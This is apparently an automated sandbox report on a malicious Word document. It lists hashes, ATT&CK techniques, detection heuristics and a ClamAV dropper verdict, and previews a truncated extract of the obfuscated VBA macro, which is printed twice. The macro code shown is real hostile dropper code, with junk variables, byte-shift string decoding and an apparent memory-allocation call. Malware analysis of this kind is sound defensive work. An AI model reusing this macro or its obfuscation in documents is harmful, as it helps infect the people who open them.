Office (OLE) malware analysis — malicious · 62bf62f4e9ea631b

MALICIOUS

Office (OLE)

251.5 KB Created: 2017-12-20 15:04:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 46e4de4da5bf75a9c240a52dac1f605e SHA-1: 12914e383f16e147220b6d085fcbcb971c67249a SHA-256: 62bf62f4e9ea631b0dd295c1b71f3db684e97d247f405b778b23e5e8d3adbb16

142 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro, and heuristics indicate a lure to enable macros. ClamAV detection as 'Doc.Dropper.Agent-6404622-0' strongly suggests a dropper functionality. The VBA script, though heavily obfuscated, likely performs actions to download and execute a secondary payload, consistent with a macro-based dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6404622-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6404622-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11837 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11837 bytes
SHA-256: `ecaccd7c5edf358e15699ddb2c234328b30f37f5be3c4f43713ea0d7304fc88e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function logorrhea() Dim conducted As Integer Dim demureness As Long vostro.upside.Value = Day(#12/5/2013#) varday = hazard = clivers cytotoxin = "nata" noctua = "headforemost" jackanapes = "smoldering" lj = "achene" nonoccurrence = "arare" despised = "negativism" bimonthly = greathearted Set prow = vostro.upside.SelectedItem burgrass = 57 + 34 Pmt 0, burgrass, 2547, 58592, 8 oryctology = prow.Name disproportionately = 57 - 55 + 7842 pempheridae = Right(oryctology, disproportionately) cadj = stabbing(pempheridae) goldes = 30 + 55 Pmt 0, goldes, 28318, 40376, 4 archive = "deserving" #If (24 - 128 + 504 + 35 - 86 + 351) > ((81 - 49 + 288) - (99 - 127 + 568) * 1) And ((127 - 126 + 27) - (95 - 20 - 47)) * 2 < (Win64) Then Dim samarium As Long Dim allknowing As LongPtr Dim hamamelis As LongPtr Dim cubicle As Variant Dim herein As Variant Dim racketing As LongPtr Dim chordal As LongPtr Dim neencephalon As LongPtr caesural = 7 - 40 + 2097 #ElseIf (62 - 33 + 371 + 86 - 101 + 315) > ((87 - 53 + 286) - (73 - 100 + 567) * 1) And Not ((8 - 33 + 53) - (64 - 67 + 31)) * 2 < (Win64) Then Dim metastasis As Byte Dim hamamelis As Long Dim numinous As String Dim allknowing As Long Dim racketing As Long quixote = 63 - 117 + 835 Dim chordal As Long Dim neencephalon As Long caesural = quixote + 3459 #End If mercurous = 124 - 56 - 68 jimdandy = niobite episcopalian = "gastroenterologist" descriptively = 79 - 102 + 4119 rapture = 35 + 18 Pmt 0, rapture, 16665, 37705, 7 fatherliness = yep adscriptus = drinking aumbry = "adorably" malfeasance = "irrittaabile" beekeeping = 36 + 14 Pmt 0, beekeeping, 31985, 38531, 8 nike = cadj alldevouring = "psocidae" chaotic = "auriculate" allknowing = mustang.oxidized(nike, beekeeping + 12) cacique = "chess" frau = "goy" Dim acoustically As Byte Dim soup As Long racketing = 57 - 56 - 1 hamamelis = allknowing + caesural chordal = 50 - 83 + 201560 neencephalon = 74 - 48 + 3474 pinch = active(chordal, _ racketing, hamamelis, _ racketing, racketing, racketing, _ racketing) crosse = 16 + 53 Pmt 0, crosse, 24585, 47796, 5 End Function Function stabbing(ilmenite) As String Dim canvasser(6962) As Byte Dim ubique As Long Dim eurasian As Long Dim excipiendis() As Byte Dim axle(63) As Long Dim cryptical(63) As Long unending = unending Dim musette(63) As Long Dim valance As Long Dim moses As Integer Dim bathyergidae As String Dim legitimately As Long Dim flap As Byte dedicate = 73 - 91 + 16515090 taffy = 44 - 122 + 4110 bailey = 31 - 74 + 107 clawed = 49 - 37 + 65268 Dim transmission As String indisposition = 36 - 72 + 292 bregma = 80 - 25 + 257993 frostweed = 73 - 5 + 4028 bossed = 112 - 54 + 5 ministering = 101 - 75 + 262118 Dim antispasmodic As Variant starry = 76 - 60 + 65520 ceiba = 40 - 114 + 16711754 husk = 23 - 91 + 323 Dim builtin As Byte crownwork = 84 - 55 + 7814 Dim curable() As Byte curable = VBA.StrConv(ilmenite, 120 + 8) motazilite = 30 + 58 Pmt 0, motazilite, 12040, 10119, 3 camassia = 7843 mini = vbKeyShift - 12 For reptatorial = 0 To camassia If reptatorial Mod 2 = 0 Then curable(reptatorial) = curable(reptatorial) - mini Else curable(reptatorial) = curable(reptatorial) - (mini - 1) End If Next reptatorial bivalvular = 54 + 17 Pmt 0, bivalvular, 4282, 23473, 4 moses = 0 astrakhan = tripping For eurasian = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) musette(eurasian) = immelodious(eurasian, bailey, 33) axle(eurasian) = immelodious(eurasian, frostweed, 33) cryptical(eurasian) = immelodious(eurasian, ministering, 33) Next eurasian armorer = 6 + 28 Pmt 0, armorer, 4942, 17568, 4 excipiendis = curable chilomycterus = 98 - 125 + 31 miterwort = 59 + 40 Pmt 0, miterwor ... (truncated)

SHA-256: ecaccd7c5edf358e15699ddb2c234328b30f37f5be3c4f43713ea0d7304fc88e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function logorrhea()
Dim conducted As Integer
Dim demureness As Long
vostro.upside.Value = Day(#12/5/2013#)
varday = hazard = clivers
cytotoxin = "nata"
noctua = "headforemost"
jackanapes = "smoldering"
lj = "achene"

nonoccurrence = "arare"
despised = "negativism"
bimonthly = greathearted
Set prow = vostro.upside.SelectedItem
burgrass = 57 + 34
 Pmt 0, burgrass, 2547, 58592, 8

oryctology = prow.Name
disproportionately = 57 - 55 + 7842
pempheridae = Right(oryctology, disproportionately)
cadj = stabbing(pempheridae)
goldes = 30 + 55
 Pmt 0, goldes, 28318, 40376, 4

archive = "deserving"
#If (24 - 128 + 504 + 35 - 86 + 351) > ((81 - 49 + 288) - (99 - 127 + 568) * 1) And ((127 - 126 + 27) - (95 - 20 - 47)) * 2 < (Win64) Then
Dim samarium As Long
Dim allknowing As LongPtr
Dim hamamelis As LongPtr
Dim cubicle As Variant
Dim herein As Variant
Dim racketing As LongPtr
Dim chordal As LongPtr
Dim neencephalon As LongPtr
caesural = 7 - 40 + 2097
#ElseIf (62 - 33 + 371 + 86 - 101 + 315) > ((87 - 53 + 286) - (73 - 100 + 567) * 1) And Not ((8 - 33 + 53) - (64 - 67 + 31)) * 2 < (Win64) Then
Dim metastasis As Byte
Dim hamamelis As Long
Dim numinous As String
Dim allknowing As Long
Dim racketing As Long
quixote = 63 - 117 + 835
Dim chordal As Long
Dim neencephalon As Long
caesural = quixote + 3459
#End If
mercurous = 124 - 56 - 68
jimdandy = niobite
episcopalian = "gastroenterologist"
descriptively = 79 - 102 + 4119
rapture = 35 + 18
 Pmt 0, rapture, 16665, 37705, 7

fatherliness = yep
adscriptus = drinking
aumbry = "adorably"
malfeasance = "irrittaabile"
beekeeping = 36 + 14
 Pmt 0, beekeeping, 31985, 38531, 8

nike = cadj
alldevouring = "psocidae"
chaotic = "auriculate"
allknowing = mustang.oxidized(nike, beekeeping + 12)
cacique = "chess"
frau = "goy"
Dim acoustically As Byte
Dim soup As Long
racketing = 57 - 56 - 1
hamamelis = allknowing + caesural
chordal = 50 - 83 + 201560
neencephalon = 74 - 48 + 3474
pinch = active(chordal, _
racketing, hamamelis, _
racketing, racketing, racketing, _
racketing)
crosse = 16 + 53
 Pmt 0, crosse, 24585, 47796, 5

End Function

Function stabbing(ilmenite) As String
Dim canvasser(6962) As Byte
Dim ubique As Long
Dim eurasian As Long
Dim excipiendis() As Byte
Dim axle(63) As Long
Dim cryptical(63) As Long
unending = unending

Dim musette(63) As Long
Dim valance As Long
Dim moses As Integer
Dim bathyergidae As String
Dim legitimately As Long
Dim flap As Byte

dedicate = 73 - 91 + 16515090
taffy = 44 - 122 + 4110
bailey = 31 - 74 + 107
clawed = 49 - 37 + 65268
Dim transmission As String

indisposition = 36 - 72 + 292
bregma = 80 - 25 + 257993
frostweed = 73 - 5 + 4028
bossed = 112 - 54 + 5
ministering = 101 - 75 + 262118
Dim antispasmodic As Variant

starry = 76 - 60 + 65520
ceiba = 40 - 114 + 16711754
husk = 23 - 91 + 323
Dim builtin As Byte
crownwork = 84 - 55 + 7814
Dim curable() As Byte
curable = VBA.StrConv(ilmenite, 120 + 8)
motazilite = 30 + 58
 Pmt 0, motazilite, 12040, 10119, 3

camassia = 7843
mini = vbKeyShift - 12
For reptatorial = 0 To camassia
If reptatorial Mod 2 = 0 Then
curable(reptatorial) = curable(reptatorial) - mini
Else
curable(reptatorial) = curable(reptatorial) - (mini - 1)
End If
Next reptatorial
bivalvular = 54 + 17
 Pmt 0, bivalvular, 4282, 23473, 4

moses = 0
astrakhan = tripping
For eurasian = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
musette(eurasian) = immelodious(eurasian, bailey, 33)
axle(eurasian) = immelodious(eurasian, frostweed, 33)
cryptical(eurasian) = immelodious(eurasian, ministering, 33)
Next eurasian
armorer = 6 + 28
 Pmt 0, armorer, 4942, 17568, 4

excipiendis = curable
chilomycterus = 98 - 125 + 31
miterwort = 59 + 40
 Pmt 0, miterwor
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.